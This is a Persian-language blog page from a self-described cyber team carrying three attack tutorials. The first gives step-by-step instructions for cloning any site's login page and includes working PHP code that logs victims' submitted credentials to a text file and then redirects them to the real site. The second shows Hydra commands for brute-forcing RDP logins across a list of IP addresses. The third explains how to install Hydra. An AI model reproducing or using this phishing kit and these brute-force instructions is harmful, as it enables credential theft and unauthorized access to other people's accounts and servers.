تیم سایبری محمد رسول الله

خانه درباره ما تماس با ما shell package <tel> کانال <tel/>

۵ مطلب در خرداد ۱۴۰۰ ثبت شده است

ساخت فیشینگ برای تمام سایت ها

به نام خدا

 

با آموزش فیشینگ صفحات مختلف وب در خدمت شما هستیم در این روش شما قادرخواهید بود تمام صفحات لاگین رو فیشینگ کنید

 

 

فیشینگ چیست ( ویکی پدیا ) ؟

به تلاش برای به دست آوردن اطلاعاتی مانند نام کاربری، گذرواژه، اطلاعات حساب بانکی و مانند آن‌ها از طریق جعل یک وبگاه، آدرس ایمیل و مانند آن‌ها گفته می‌شود.

یا به بیان ساده‌تر هنگامی که شخصی تلاش می‌کند دیگری را فریب دهد تا اطلاعات شخصی او را در اختیارش بگیرد، یک حمله فیشینگ رخ می‌دهد و یک بازار غیرقانونی چند هزار میلیاردی را تشکیل داده است.

 

ساخت فیشینگ:

  1.  سایت تارگت را باز  کرده و روی کادری که تمام صفحه را شامل میشود کلیک راست کرده و save as را بزنید تا صفحه مورد نظر دانلود شود.
  2.  دقت کنید فایل باید html باشد یعنی پسون .html باشد
  3.  نام فایل رو به index تغییر دهید یعنی(index.html)

 

 

  1.  حالا در هر مسیری که فایل تارگت قرار دارد یک فایل  txtایجاد کنید هر نامی که میخواهید قرار دهید مثلا ما نام فایل روcombo  قرار میدیم (combo.txt)

اطلاعات در این فایل ذخیره میشه!

  1. یک فایل php ایجاد کنید این فایل همان فایلی است که اطلاعات وارده را ذخیره میکند پس اسم این فایل را فیشینگ یا... قرار ندهید
  2. تکه کد زیر را در فایل وارد کنید فقط به جای combo.txt اسم فایل مورد نظر خودتون رو بزارین:

<?php

Header("Location: http://www.TargetDomain.com");

 

$handle = fopen("combo.txt", "a");

 

foreach($_GET as $variable => $value) {

 

fwrite ($handle, $variable);

fwrite ($handle, $value);

fwrite ($handle, "\r\n");

}

fwrite ($handle, "\r\n");

 

fclose($handle);

exit;

?>

 

  1. فایل اصلی html را بازکنید ودنبال تگی به اسم form بگردید. در تگ مقدار action را پیدا کنید و ادرس فایل php رو جایگذاری کنید(دقت کنید ادس باید بین دو دابل کوتیشن باشد(دابل کوتیشن یعنی " ) )

 

 

  1. در ادامه همان تگ متود مورد نظر رو به get تغییر دهید چون در این متود اطلاعات از ظریق ادرس بارگزاری میشود(معمولا متود از نوع post هست که اون رو باید تغییر بدین)

 

 

فایل ها رو در هاست خودتون اپلود کنید(به ادرس فایل ها دقت کنین)

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده شما ندارد این فقط یک اموزش جهت افزایش اگاهی شما در این راستا بود

اگر سوال یا ابحامی بود در بخش نظرات کامنت کنید

۳۱ خرداد ۰۰ ، ۲۰:۳۲ ۰ نظر

کرک سرور مجازی با هایدرا + ترموکس

 

به نام خدا

Rdp چیست ؟

Rdp به معنای ریموت دسکتاپ پروتکل هست که برای برقراری ارتباط بین سیستم کلاینت و سرور های مجازی معمولا انجام می شود

 

کرک یا بروت فورس چیست ؟

بروت فورس یا به زبان عامیانه کرک  به بحملاتی گفته میشود که هکر با حدس زدن پسورد های مختلف روی حساب کاربری شخص در هرجا میتواند باشد اما این حملات بسیار خطرناک بوده چون حساب های زیادی از این طریق هک شده

 

هایدرا چیست؟

هایدرا شناخته شده ترین و برترین ابزار جهت بروت فورس هست که برای لینوکس ترموکس و ویندوز منتشر شده که دلیل شناخته شده بودنش هم سرعت بسیار بالا و پروتکل هایی که پشتیبانی میکند هست

درواقع شما میتواند با ترموکس سرور مجازی کرک کنید که این فوق العاده است

البته لازمه اینکار نصب هایدرا در ترموکس است.

 

 

اموزش کرک سرور مجازی با هایدرا

در ویندوز ابتدا باید cmd را باز کرده و به پوشه هایدرا بروید از اینجا به بعد مراحل کار در ویندوز و لینوکس تفاوتی ندارد

ابتدا با دستور hydra ابزار رو فرا خوانی میکنیم بهد با –L یوزر لیست خودرا ایمپورت میکنیم و –P پسورد لیست خود را ایمپورت میکنیم حال نمای کلی کد ما به شکل زیر است

hydra –L user-list.txt –P pass-list.txt

حالا باید ایپی لیست خود را با دستور –M به هایدرا بدهیم و در اخر هم rdp را اضافه کنیم تا هایدرا متوجه پروتکلی که قراره کرک کنه بشه

و دستور نهای با به شکل زیر هست

hydra –L user-list.txt –P pass-list.txt –M ip-list.txt rdp

در کد بالا به جای user-list.txt یوزر لیست و به جای pass-list.txt پسورد لیست و بجای ip-list.txt ایپی لیست خود را قرار بدین

 

برای نصب هایدرا در ترموکس هم میتوانید دو دستور زیار را به ترتیب وارد کنید

apt update

pkg install hydra

هرجا (y/n) امد شما y رو به معنای یس وارد کنید

 

برای مطالب جذاب تر کامنت بزارین تا به ما قوت قلب بدین و اگر سوالی داشتین یا مشکلی وجود داشت در کامنت ها بگین تا در اسرع وقت جواب بدیم

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده شما ندارد

۳۱ خرداد ۰۰ ، ۱۳:۳۱ ۰ نظر

اموزش نصب هایدرا در اوبونتو به صورت گرافیکی و در ترموکس

به نام خدا

با اموزش نصب هایدرا در خدمتتون هستم

 

1 . هایدرا چیست

هایدرا یکی از برترین ابزار های کرک است که میان هکر ها محبوبیت بسیار زیادی دارد

این ابزار از پروکتل های بسیار زیادی مانند smtp / http / xmpp / vnc و.... پشتیبانی میکند

این ابزار در طی سال های اخیر جزو ۱۰ ابزار برتر در زمینه هک و امنیت بوده است

که این خود قابل توجه است

این ایزار قدرتند به صورت پیشفرض در سیستم عامل های امنیتی مانند کالی موجود میباشد

همچنین این ابزار دونوع گرافیکی و خط فرمانی دارد که در این اموزش میخواهیم نحوه نصب

این ابزار در اوبونتو را به صورت کامل توضیح دهیم

2 . اموزش نصب هایدرا در اوبونتو

خوش بختانه هرددو نسخه این این ابزار در مخازن اوبونتو موجود هست

که باید نصبش کرد

نصب نسخه خط فرمانی

برای نصب هایدرا به صورت خط فرمانی ابتدا باید مخازن خود را بروز کنید

برای بروز رسانی متن زیر را کپی کرده و در ترمینال خود وارد کنید

sudo apt update

باید پسورد روت خود را وارد کنید

حال باید خود ابزار را نصب کنید

برای نصب دستور زیر را در ترمینال خود کپی کنید

sudo apt-get install hydra

با دستور sudo دسترسی روت میگیرید

و با دستور apt-get میگید که از مخازن اصلی اوبونتو عملیات رو انجام بده

و با دستور install hydra میگید که برنامه مورد نظر که هایدرا هست رو نصب کنه

هرجا (y/n) اورد شما y که به معنای اوکی یس یا بله هست رو بزنید

برای اجرا هایدرا رو در ترمینال فراخوانی کنید با دستور زیر

hydra

برای یادگیری دستورات دستور زیر را در ترمینال کپی کنید و پاسخ داده شده را

در مترجم گوگل کپی کنید

hydra -h

اموزش نصب هایدرا نسخه گرافیکی

ترمبنال رو باز کنید و متن زیر رو برای اپدیت مخزن وارد کنید

sudo update

هرجا (y/n) اورد شما y که به معنای اوکی یس یا بله هست رو بزنید

حال با دستور زیر برنامه رو نصب کنین

sudo apt-get install hydra-gtk

توضیح نمیدم دیگه

هرجا (y/n) اورد شما y که به معنای اوکی یس یا بله هست رو بزنید

حالا برای اجرای ابزار در منو ابزار  xhydra رو اجرا کنید

 

اموزش نصب هایدرا در ترموکس :

برای نصب هایدرا در ترموکس با دستور زیر ابتدا مخازن خود را اپدیت کنید

apt update و apt upgrade

سپس با دستور زیر هایدرا رو نصب کنید

Apt insall haydra

با دستور apt مخازن رو فرا خوانی میکنیم و با دستور install hydra به مخازن میگیم هایدرا رو نصب کنه

هرجا (y/n) داشت شما y رو بزنید

حالا هایدرا بصورت کامنت لاین نصبه ومیتونین اون رو اجرا کنین که در یک پست جدا گانه به اموزش کامل هایدرا می پردازیم

 

برای نصب هایدرا در ویندوز همچون رروش متفاوتی داره و در این پست نمی گنجه در یک مطلب جدید برای شما بارگزاری میکنیم

لطفا جهت حمایت کامنت بزارین و اگر مشکلی در پست بود در کامنت ها بگین تا رفع بشه

ممنون ز توجه شما

۳۰ خرداد ۰۰ ، ۱۵:۱۵ ۰ نظر